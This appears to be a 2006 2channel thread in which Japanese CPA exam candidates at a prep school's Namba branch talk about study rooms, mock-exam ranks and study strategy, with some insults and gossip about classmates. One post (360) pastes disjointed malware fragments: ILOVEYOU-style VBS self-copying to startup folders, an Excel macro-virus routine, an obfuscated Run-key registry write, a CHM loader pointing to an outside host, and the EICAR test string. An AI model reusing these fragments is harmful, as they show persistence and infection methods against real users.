管理は一応得意科目だからでも本番はおそらくとれないけど

202 :一般に公正妥当と認められた名無しさん:2006/07/29(土) 23:45:05 ID:???
>>198
3年目で去年論文A落ち。
Tの全党は一回目300番以内には入った

203 :一般に公正妥当と認められた名無しさん:2006/07/30(日) 10:20:01 ID:???
>>193
自習室で朝から夜閉まるまで租税テキストチラ見。
簿・管ステップ回し。
昼寝2時間弱。
8月入ったら税理士受験生は自習室利用少なくなるのかな? やっぱ本試験終わっても自習室にたくさん来るんだろうか?


204 :一般に公正妥当と認められた名無しさん:2006/07/30(日) 11:36:16 ID:???
税理士試験過ぎれば驚くほど減るから安心しろ。
自習室701で10人くらいの時もあるくらい。

205 :一般に公正妥当と認められた名無しさん:2006/07/30(日) 11:39:10 ID:???
そんなもんなの
税理士試験って一年に一回なんだっけ

206 :一般に公正妥当と認められた名無しさん:2006/07/30(日) 15:02:39 ID:???
自習室のコミグアイどう?

207 :一般に公正妥当と認められた名無しさん:2006/07/30(日) 15:09:25 ID:???
スキスキ

208 :一般に公正妥当と認められた名無しさん:2006/08/02(水) 09:42:19 ID:???
管理ラスト寝坊した…
解いたほうがよさげ??

209 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 08:33:45 ID:PWPHN2x4
サービスカウンターの女対応悪すぎ

210 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 09:01:22 ID:???
お前が横柄な態度とるからだろ。
無職のくせに偉そうなんだよ。

211 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 10:35:28 ID:???
自習室も空いたことだし、今日からが本当の追込みだな。

212 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 17:31:55 ID:???
自習室の混み具合どう?空きまくり?重役出勤でも確保できそう?

213 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 17:40:57 ID:???
夜勤でも余裕ですよ。

214 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 17:47:51 ID:???
>>213
まじ?やはり税理士生がほとんどなんだ。
短答落ちだけど来週から上級完成始まるしまた頑張ろう…はぁ上級三年目か…

215 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 18:43:21 ID:???
曝し上げますね

216 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 20:51:45 ID:???
嘘書いたらあかんやろ。
混み過ぎやっちゅーねん!自習室どうにかしてくれ〜

217 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 21:26:41 ID:???
結局どっちなんだ?

218 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 22:38:09 ID:???
自習室は好き好きだが、
自習室の入り口に
「他校生と短答落ちの方はご遠慮ください」
と書いてある。

219 :一般に公正妥当と認められた名無しさん:2006/08/03(木) 23:36:00 ID:???
来年上級三年目短答落ちの俺は自習室使ったらダメなのか…

220 :一般に公正妥当と認められた名無しさん:2006/08/04(金) 01:58:48 ID:???
短答落ちは公園のブルーシートの特設自習室逝けよ。

221 :一般に公正妥当と認められた名無しさん:2006/08/04(金) 12:03:58 ID:???
空いてるね〜

222 :一般に公正妥当と認められた名無しさん:2006/08/04(金) 14:45:28 ID:HUn2COOK
自分は数学が苦手で簿記試験も受けたことないんですが
来年から公認会計士に2年で合格するコースで予備校に通うん
ですがこの状況はかなりマズイでしょうか?お願いしますm(_ _)m

223 :一般に公正妥当と認められた名無しさん:2006/08/04(金) 17:11:09 ID:???
何がお願いしますなの?少しは自分で考えろよ…。

224 :一般に公正妥当と認められた名無しさん:2006/08/04(金) 18:49:54 ID:???
>>222
長時間の勉強に耐えられる忍耐力
とやる気があればマズイという事にはなんないよ


225 :一般に公正妥当と認められた名無しさん:2006/08/04(金) 22:47:35 ID:Yjaey8PX
会計士試験に必要なのはむしろ国語力かと(^o^)
後は、考える力かな?
他は、後からついてくるでしょ
まあ、答練わからんから言って白紙で提出するようなアフォは諦めて肉体労働へGOをお勧め



226 :一般に公正妥当と認められた名無しさん:2006/08/04(金) 23:19:08 ID:???
 

227 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 01:25:32 ID:W1BkmkLl
>>224
親がお金だしてくれるし予備校でひたすら頑張ります。ありがとうございました。
>>225
国語は得意です。数学も実はテストの点数はわりと良かった(高校時代は駿台模試で70くらいあった)
けど初見の問題はほとんどとけないし
芯から理解したと思えることが少ない(今だになぜ円順列が(n-1)!)になるのか芯から理解できないくらいセンスがないんですよね。
どこまで僕の能力をごまかせるか分からないけど肉体労働みたい薄汚い人種にならないよう頑張ってみます。
ありがとうございました。

228 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 01:33:05 ID:???
>>227の性格がものすごく悪い件について

229 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 01:40:02 ID:e6ReaUcx
経済選択だったけど(今はあんまり選択する人いないのかなぁ)、
芯から理解していたかというと、とってもアヤシイ。。。
でも受かったよ(*^_^*)
やっぱり試験だから運の要素も少しはあると思うけど、
努力は報われると信じています。
幸運は努力しないとつかめないと思うし。
ということで、会計士補の私は、租税法と監査論の合格を
目指して勉強頑張ります!!!



230 :おっさん ◆uqnuWIBAu2 :2006/08/05(土) 13:28:16 ID:MWxmW5kZ
しんどすぎる、また狂ってきたかな捧
んで2チャンも久々すぎる
忘れられてそう・リ

231 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 13:28:58 ID:???
おっさん、元気しとったか
寂しかったで
仕上がり具合はどうや

232 :おっさん ◆uqnuWIBAu2 :2006/08/05(土) 13:32:27 ID:MWxmW5kZ
覚えててくれたかモモモ
とりあえずシコシコ勉強しまくってん、まぁ微妙に仕上がってきたかなヒ
君はどないだ?

233 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 13:36:27 ID:???
わしはそんなに仕上がっとらん
でもまあやるしかないわな
判定にもつれ込んだら何が起こるかわからんし

234 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 13:40:17 ID:???
おぉ!絵文字おやじが帰ってキタ☆

235 :おっさん ◆uqnuWIBAu2 :2006/08/05(土) 13:41:45 ID:MWxmW5kZ
まだ2週間ある、とことんやれるだけやろフ」
わしもまだ精度を上げていかなあかんしォォ
科目合格か、監査法人の動向が気になるなナ

236 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 13:42:55 ID:???
あなごもロムってないで出て恋や

237 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 13:43:17 ID:???
【帰ってきた絵文字おやじ】
ウルトラマンですねw

238 :おっさん ◆uqnuWIBAu2 :2006/08/05(土) 14:06:45 ID:MWxmW5kZ
また余裕できたら夜来ますム、

239 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 14:11:23 ID:???
今日淀川花火大会だけど皆見に行かないの?
俺彼女と見に行くんだけど。

240 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 14:11:34 ID:???
ここカキコしてんのは論文行き組しかないのかな?短答落ちはカキコ無しか?
まぁ初受験短答落ちな俺だけど…。そこで上級の先輩方や来年向けて勉強してる06の同期に質問したいんだが、短答落ちってのは本試験終わってから簿管租の計算ばかりしっかり固めるスタンスでいいのかな?
先生に質問行ったんだが、『ステップ完璧にすればいい。』しかゆわないんだよなぁ…。管理の理論や他理論科目で後回しでいいとゆうし。 落ちた後どうゆう風に過ごしていたか教えてもらえませんかね?(^-^;

241 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 14:32:50 ID:???
今年論文受験者です。
思うに計算が仕上がっていれば今年の短答は楽勝だったと思うよ。ダメだった人は簿記で撃沈か、監査や財務表で正解できなかったか。
とすると、対処策としては講師が言うようにこの夏から年内にかけて計算(簿管は当然、租税も)特化して07ステップでは常時上位20%目標にするべき。

242 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 14:35:16 ID:???
理論科目は上級講義の都度、テキスト加工、疑問点解消、簡易な定義は暗記等を行うのが得策かと。復習なんて次の講義が始まるまでテキスト読みするくらいで十分。年明けからは嫌でも理論に時間割かないとダメなわけだし。

243 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 14:36:40 ID:???
あと管理理論はステップに出てくる理論潰すくらいで良いかと。他スレ既出かつ昨年合格した友人も言ってたんだが、本試験の理論は満点取らせないために出題していて計算しっかり正解してれば理論でなんて差がつかないと。

244 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 14:38:19 ID:???
まぁとりあえず計算重視でやるべきかと。でもステップやりっぱなしじゃダメでテキスト例題完璧にしたり、間違いノート作成とかもすべき。

245 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 14:39:39 ID:???
これらは時間に余裕ある今の時期にしかできない事だと思うから、こんな基礎論点なんて…って馬鹿にせずにやれば必ず自分の実力向上に繋がると思うよ。

246 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 14:43:17 ID:???
以上、5分割したレスになってしまい申し訳ない。
偉そうに聞こえたなら申し訳ない。
かく言う俺も租税仕上がってなくて結構ピンチ…。タックからの移籍組二年目男でした。

247 :240:2006/08/05(土) 17:01:56 ID:???
レスありがとうございます!
そうですか、、、わかりました。計算年内に完璧な状態に仕上げていきます!
管理の理論ってステップに出てくるので十分なんですか。。それと基準を読んでいればOKって感じですかね?
色々とありがとうございます!論文試験頑張ってください☆


248 :一般に公正妥当と認められた名無しさん:2006/08/05(土) 22:17:09 ID:???
おっさん!!

249 :一般に公正妥当と認められた名無しさん:2006/08/06(日) 00:17:14 ID:???
はげ

250 :みんなガンバレ:2006/08/06(日) 17:47:15 ID:DY/hRChQ
難波校の皆様。試験頑張ってください。私は2000年に合格した難波校OBです。ところで、どなたかK川さんを知りませんか?超ベテです。教えてください。

251 :K川:2006/08/06(日) 22:26:25 ID:???
K川だけどなんか用?

252 :一般に公正妥当と認められた名無しさん:2006/08/07(月) 01:04:54 ID:???
2000年に大原難波校は存在しなかったと思うが・・・。

253 :一般に公正妥当と認められた名無しさん:2006/08/08(火) 20:09:58 ID:OioCRp8p
それが存在してたんですよ!もっとも当時はJスクールといって、場所は河原ビルというNGKのそばにあった。会計士コースもビデオブースのみであった。

254 :一般に公正妥当と認められた名無しさん:2006/08/08(火) 22:46:29 ID:???
在外連結キャッシュの間接法で原則法の仕訳の論理解説してくれ
仕入れ債務の増減と売利上げ債権の増減相殺したときに
為替利益を連結精算表上で加算減算する理由がむずかしい




255 :一般に公正妥当と認められた名無しさん:2006/08/08(火) 23:50:50 ID:???
>>254
俺もその仕訳意味不明っス・・・。

256 :一般に公正妥当と認められた名無しさん:2006/08/09(水) 00:38:42 ID:???
オイオイ、そんなこともわからないのか!?
来年に向けて勉強しておきなさい。

257 :一般に公正妥当と認められた名無しさん:2006/08/11(金) 20:22:54 ID:???
自習室の空き具合はどう?

258 :一般に公正妥当と認められた名無しさん:2006/08/11(金) 21:10:58 ID:???
スカスカ

259 :一般に公正妥当と認められた名無しさん:2006/08/12(土) 03:38:19 ID:N9UkwgJH
難波校ってギャル多い??

260 :一般に公正妥当と認められた名無しさん:2006/08/12(土) 03:58:10 ID:???
多いね。帰りにみんなOCATでパラパラ踊ってるよ。

261 :一般に公正妥当と認められた名無しさん:2006/08/12(土) 16:32:36 ID:???
リクルートどうする?俺あずさにしよ−かな−

262 :一般に公正妥当と認められた名無しさん:2006/08/12(土) 16:59:44 ID:???
俺は試験終わって一週間休んで、また九月から勉強始めるよ。

263 :一般に公正妥当と認められた名無しさん:2006/08/12(土) 17:01:52 ID:???
受かろうとする気持ちが大事だ、精神論だが。

264 :一般に公正妥当と認められた名無しさん:2006/08/12(土) 23:13:52 ID:BEPWdKkY
あらったってどうなの?

265 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 13:54:56 ID:???
公開模試どだった?
600番台って受かる?

266 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 13:56:20 ID:???
よゆう

267 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 13:59:27 ID:???
まだ返ってこんぞ。
何人受けてた??

268 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 14:17:10 ID:???
600番台さん何年目?何人受けてた?

269 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 14:19:49 ID:???
谷〇ときれいなね−ちゃん名前載せてた、こいつら凄いわ
檜〇は載ってなかったな


270 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 14:22:04 ID:???
初受験だよ。
今手元にないから詳しくはわからんけど、しほ込み1800人抜きで1300人ぐらいだったとおもう。

271 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 14:56:01 ID:???
会計学Fでそれ以外すべてGの俺はどうすれば…

272 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 15:35:42 ID:???
皆どうだったの?ここで晒そうや。
俺、725位/1317人…無理だ…

273 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 15:48:45 ID:???
おいおい、そんなことしたら特定されっぞ。

274 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 15:52:25 ID:???
職員ですが、現在データベースにアクセスして調査中です。

275 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 16:30:45 ID:???
おいおい272に釣られるなww
優秀者以外どうやって特定されるんだよ。
データベースて…職員に知られても何て無いだろ。

276 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 16:33:57 ID:???
ここの発言の約3割は俺だからww

277 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 17:14:14 ID:???
成績優秀者一覧表なんかを見ると難波の弱さが露呈するよな…
なんでなんだろ?

278 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 18:51:58 ID:???
300番台は余裕だよね?

279 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 18:59:44 ID:???
余裕だろ…上位25%くらいだろ。
初でつか?

280 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 19:53:59 ID:???
TAC2年目です。全答は200番ぐらい

281 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 23:57:33 ID:dTSdeYZD
上位25%でも判定はC(合格可能性あり)って程度らしいよ^^;
そうすると↑のスレ見る限り、今年も難波は凶作か・・・
O江先生が急にやる気出したのも危機感のあらわれ??
そーいや、めがねっ娘や○田の話題、最近見ないけど、何やってんだろ?


282 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 00:04:50 ID:???
>>269
「きれいなね−ちゃん」ってダレ??

283 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 00:44:37 ID:???
めがねっ娘は只今療養中でつ
○田は毎日毎日自習室の住人でつ
きれいなねーちゃんも自習室の住人でつ


284 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 01:01:45 ID:???
めがね娘短答落ち?

285 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 02:30:43 ID:???
落ちだぞ〜

286 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 10:52:08 ID:???
>>283
「きれいなねーちゃん」ってダレ??

287 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 11:57:06 ID:???
めがね落ちたんだ…その彼氏らしき人は?

288 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 12:25:35 ID:???
C判定って余裕で合格するのでしょうか?

289 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 13:13:49 ID:???
俺は去年Cで落ちた。
Cくらいだったら結構落ちてるよ

290 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 16:27:41 ID:???
毎年谷〇レベルの入門生は合格していくもんなの?

291 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 16:37:39 ID:???
そりゃそうだろ。
あいつが合格しなかったら誰が合格すんだ

292 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 16:41:47 ID:???
07上級ってもう始まってる?理論科目の講義とか。
あと簿記改正の負担どんな感じ?

293 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 16:43:42 ID:???
彼氏らしき奴も当然落ちたよー

294 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 16:49:29 ID:???
ホントに?!優秀そうだったけど…
二人揃ってこの簡単な短答落ちか…

295 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 17:17:13 ID:???
会計士の勉強じゃなく、せっくるの勉強ばっかしてたんでねえかい?

296 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 17:39:21 ID:???
あの短落カプールは来年も頑張るの?

297 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 19:54:01 ID:???
成績優秀者て何番までですか?

298 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 20:16:06 ID:???
会計士の本科ってどうなの?
講師は一緒なのかな

299 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 12:39:04 ID:???
盆休みやけど、皆勉強してる??
この三日間全くしてねーやw 息抜きしまくりだな…。明日からまた本腰いれてやるぞー!

300 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 13:34:08 ID:???
>>299
論文組?俺もだ…。墓参りや同窓会やらイベント目白押し。

301 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 13:43:23 ID:???
これで難波は今年も壊滅だね☆
みんな戻ってこいよヽ(´ー`)ノ

302 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 17:07:52 ID:???
これが難波イズム!

303 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 17:46:57 ID:???
まったくここはひどいインターネットですね
皆さんはひとの痛みがわからないのでしょうか
匿名だからといって無責任な発言が多すぎますよ!!
被害者の人権はどうでも良いというのでしょうか?
ニュースステーションの筑紫さんが、インターネットのことを、
便所のトイレって言っているのを知ってます?あなたたちは
どうせニュースも見ないから知らないと存じますが。
とうとう、本気で呆れています。おばあちゃんが、どれどれ?と
画面を覗きにきました。それから、おとうさんも来ました。
その6分後、妹も来ました。あなたたちは、我が家に笑われています。
とてもいい具合です。家族みんなが、この人たちおかしいね
おかしいねって、互いに罵り合っています。おかあさんは、
もう3年家に帰ってきてませんが、必ずおかあさんもおかしいね、
って云うと思いますよ。どうです?私に謝るなら、今のうちですよ。
私はこれでも気が遠いほうなんです。また3日後、ここに来ます。

304 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 19:51:03 ID:???
俺、論文組だけど今月19日から始まる世界バスケが気になって勉強に身が入
んなくなっちゃうかも・・。

305 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 21:19:05 ID:???
>>303
短答落ち乙。
文章が所々意味不明なんで論文も一生無理そうだね。

306 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 21:56:08 ID:???
難波は毎年何人受かるの?

307 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 22:33:47 ID:???
去年は四人くらい。 今年は8人くらい期待できるんじゃね?

308 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 23:28:50 ID:???
>>307
それは一年目の人ですよね?

309 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 23:34:24 ID:???
>>308
ここをどこだと思ってんだ?ww難波だぞ? 入・上合わせて4人だよ。入は確か二人だとか。
今年は入門優秀生だから期待できるね。
俺は短答落…

310 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 23:44:45 ID:???
難波ってレベルが低いの?
会計士って一発で合格して当たり前なんだよね?

311 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 23:47:59 ID:???
おっしゃる通りレベル低いよww
でも一発で受かる奴なんか2%くらいだよ

312 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 23:49:31 ID:???
合格確実
谷〇
きれいなね−ちゃん
檜〇
くらいかな?

313 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 23:51:32 ID:???
奥○って奴も載ってるよ。大阪校で模試受けてたけど難波生。

314 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 23:59:25 ID:???
難波ってバカすぎて優秀者は2ちゃんで晒されます。
おまえらは本当にあふぉだな。

315 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 00:03:07 ID:???
俺上級3年目だけど、今年の短答落ちたよ。また来年も頑張るよ!

316 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 00:07:32 ID:???
3回も受けて簡単な短答にすら落ちるようなヤツは撤退しなよ。

317 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 00:08:58 ID:???
本当に民度の低い学校だなwww

318 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 00:11:45 ID:???
次は必ず受かるぜ!今回は69だったけど、予備校解答のせいで落ちたんだ。来年は余裕だぜ!

319 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 00:44:32 ID:???
69とかいやらしい数字の上にいるおまえが美しい

320 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 03:20:02 ID:???
入・上 合計20名以上短答突破してるやん。


321 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 13:48:23 ID:???
今年の短答いと易しけり、しかずして20名なるとはなんたる異な仰せ。
君落ちるが必然のごとし。

322 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 16:29:54 ID:???
成績優秀者でも○○みたいな答練バカは微妙

323 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 19:27:26 ID:???
>>322
「○○」ってダレだよ!

324 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 20:11:31 ID:???
答練バカって俺のことかっ!?
俺、優秀者に名前載ったことないぞ。

325 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 21:49:00 ID:???
今年5回目の奴、元気にしてるか〜?

326 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 22:23:27 ID:???
来ましたよー
上級4回目、通算五回目の俺が。あ、でもこれは来年受験前提の数字だからね。

327 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 22:35:10 ID:???
4回も短答におつたのか?

328 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 23:04:39 ID:???
>>322
「○○」ってダレだよ!

329 :一般に公正妥当と認められた名無しさん:2006/08/16(水) 23:05:43 ID:???
>>326
おまえ、もしかして「アイツ」か・・・!

330 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 01:32:19 ID:???
そんな落ちてるのか?
どんな香具師だよw KWSK!

331 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 11:50:28 ID:???
>>329
あまり詮索するなよ。バレてしまうから!
取り敢えず、上級完成頑張って受けてるから!

332 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 15:07:07 ID:???
6回7回受験して合格して
立派に活躍している人も居る。
そういう人が6回7回ずっと本気でやっていたわけではない。
人間本気がそんなに長く続くわけがないから。
要はどこで本気になるかだと思うよ。

333 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 17:05:35 ID:???
>>331
もしかして今自習してんぢゃねーかそいつ?
上級完成とゆうヒントでたぶんハッケンしたwww

334 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 17:28:23 ID:XXxhFSqB
全日制の上級って新しく設置されたよね。
通ってる人いる?気になってるんだけど、どうなんだろう・・・

335 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 17:43:13 ID:???
>>333
え…ま、まさか判らないですよね?
人数多いんだし…DVD振替かライブか判らないわけなんだし…

336 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 17:47:57 ID:???
全日制って本科のこと?
本科は谷〇育てたくらいだからいいんじゃない?

337 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 18:07:09 ID:???
でも谷〇以外はwww

338 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 22:18:32 ID:???
俺400番台やねんけど、どうなん?

339 :一般に公正妥当と認められた名無しさん:2006/08/17(木) 22:38:57 ID:???
難波では優秀者。
全国的には普通。

絵文字のおっさんはどうやったんや?

340 :一般に公正妥当と認められた名無しさん:2006/08/18(金) 16:12:24 ID:???
しんどいな…
あと四日なのに自習室でも寝てばっかだよ…

341 :一般に公正妥当と認められた名無しさん:2006/08/18(金) 16:49:33 ID:???
それはみんな一緒。
来年もおんなじことやりたいならずっと寝とけ。

342 :一般に公正妥当と認められた名無しさん:2006/08/20(日) 14:25:09 ID:???
とうとう明後日ですね…
がんばろうね、難波の皆…

343 :おっさん ◆uqnuWIBAu2 :2006/08/20(日) 19:19:29 ID:???
ついに明後日か〜モ
受かりたいなぁ・・・

344 :一般に公正妥当と認められた名無しさん:2006/08/20(日) 20:56:07 ID:???
もう無理だ。この試験苦し過ぎるわ
おっさん来たけどみんな出てこないってことは勉強してるのか?

345 :おっさん ◆uqnuWIBAu2 :2006/08/20(日) 22:26:29 ID:???
みんなギリギリまで頑張ってるんだろマ
まず初日の監査租税は踏張りたいな、初日から落とすと気分的にしんどい傀、、

346 :一般に公正妥当と認められた名無しさん:2006/08/20(日) 22:47:24 ID:???
おっさん調子どう?何か仕上がってそうだね。
監査は17改正、品質管理、内部統制、リスアプ、独立性倫理、違法行為で最後詰めます。
租税は理論・消費は無視で、所得少しと法人の基礎論点見直します。
いかかでしょうか?

347 :おっさん ◆uqnuWIBAu2 :2006/08/20(日) 23:18:57 ID:???
わしは全然思ったように仕上がってないけどぉッ
監査はGCも見といた方がいいんじゃないかィ
あとこんなこと直前に言いたくないけど、消費を切るのは少しまずいモォォ
まだ明日1日あんねんから固定資産調整と中間申告だけでも抑えたほうが絶対いいぞァァ

348 :一般に公正妥当と認められた名無しさん:2006/08/24(木) 01:33:18 ID:???
二日終わりましたが不合格決定です。
本当にありがとうございました。

349 :一般に公正妥当と認められた名無しさん:2006/08/24(木) 03:23:20 ID:???
ラスト1日!
おまいららんばれ

350 :一般に公正妥当と認められた名無しさん:2006/08/24(木) 16:30:57 ID:???
来年度の受験はDVD通信します。難波校のみなさん長い間どうもありがとう
ございました。また、たまに難波校に顔を見せに行きます。

351 :一般に公正妥当と認められた名無しさん:2006/08/24(木) 22:07:02 ID:RmeJDXX0
やっと終わったあああああああああ!
何気に本試験、意外な顔を何人か見た気が・・・
これもやっぱボーダー69の効果かな??
俺は、明日から来年受験目指してがんばりますhhhh
せめて、1〜2教科受かってないかな・・・

352 :一般に公正妥当と認められた名無しさん:2006/09/02(土) 01:29:00 ID:???
試験終わって誰もきてないなf^_^;あげとく☆

353 :一般に公正妥当と認められた名無しさん:2006/09/03(日) 15:42:00 ID:???
日曜でも7階は10人程度は来てるんだね。
皆夏休み状態なのか。短答落ちは上級講義の理論復習とかミッチリしだしてんの(?_?)


354 :一般に公正妥当と認められた名無しさん:2006/09/03(日) 16:40:15 ID:???
そらそうよ。

355 :一般に公正妥当と認められた名無しさん:2006/09/05(火) 04:23:30 ID:???
今から理論復習したって大して意味無いよ。今年の本試験受けた奴なら判るだろ?

356 :一般に公正妥当と認められた名無しさん:2006/09/05(火) 21:57:32 ID:J/vJ2Mx/
わけわかめ

357 :一般に公正妥当と認められた名無しさん:2006/09/06(水) 11:45:33 ID:???
   `ヽ
         〃∪'´ ̄`二二人\  ヽ
         | ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
         |ハ ,ニ、   ,. - 、 | | | l |
         | ハ ィハ     ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
         | | | じ'   |トJ〉  /)} l | 違う板にコピペすると鬼のような怖い顔
         | ハ  、'_,   ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
         l l /\    .. イV\川 |
         ,' l l ,イ `l ̄´ /   /ヽl l
         l | l ハ  `メ、    〃  ヽヽ、__ノ
         l  ∨ └‐イ「ト--ァ'´     ハヽ__ノ
         ヽ/  }  l」」 /     / }`ー
          〈_n| 八   / /     /ノ
          〈二二人 c /\/ / , イ
           /  /厂 /\__>< {_


358 :一般に公正妥当と認められた名無しさん:2006/09/06(水) 23:17:23 ID:ZQGXsuqF
スレ違いだけど・・・

今日、ナンバ校に税理士の受験相談行ってきた。
アドバイザーの兄ちゃんに、
「本気でやって、3〜4年後に2科目くらいの合格でしょう」と言われた。
ショックだ。
2科目合格くらいに、そんなに時間が掛かるの?
ダウナーな気分や。

359 :一般に公正妥当と認められた名無しさん:2006/09/06(水) 23:33:19 ID:???
墓罪なら一年で取れるよ。
会計士受験生なら。

360 :一般に公正妥当と認められた名無しさん:2006/09/07(木) 00:33:26 ID:???
>>2ё

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


361 :一般に公正妥当と認められた名無しさん:2006/09/07(木) 04:10:22 ID:???
論文受けた奴でもう勉強再開した奴、九月中に再開予定の奴、どれくらいいる?

362 :一般に公正妥当と認められた名無しさん:2006/09/07(木) 10:47:22 ID:STp3wKis
大原パンフレットに公認会計士の収入
試験合格直後 年480万
1年目 630万
5年目〜6年目 900万って書いてあるんですがそんなにもらえるんですか??

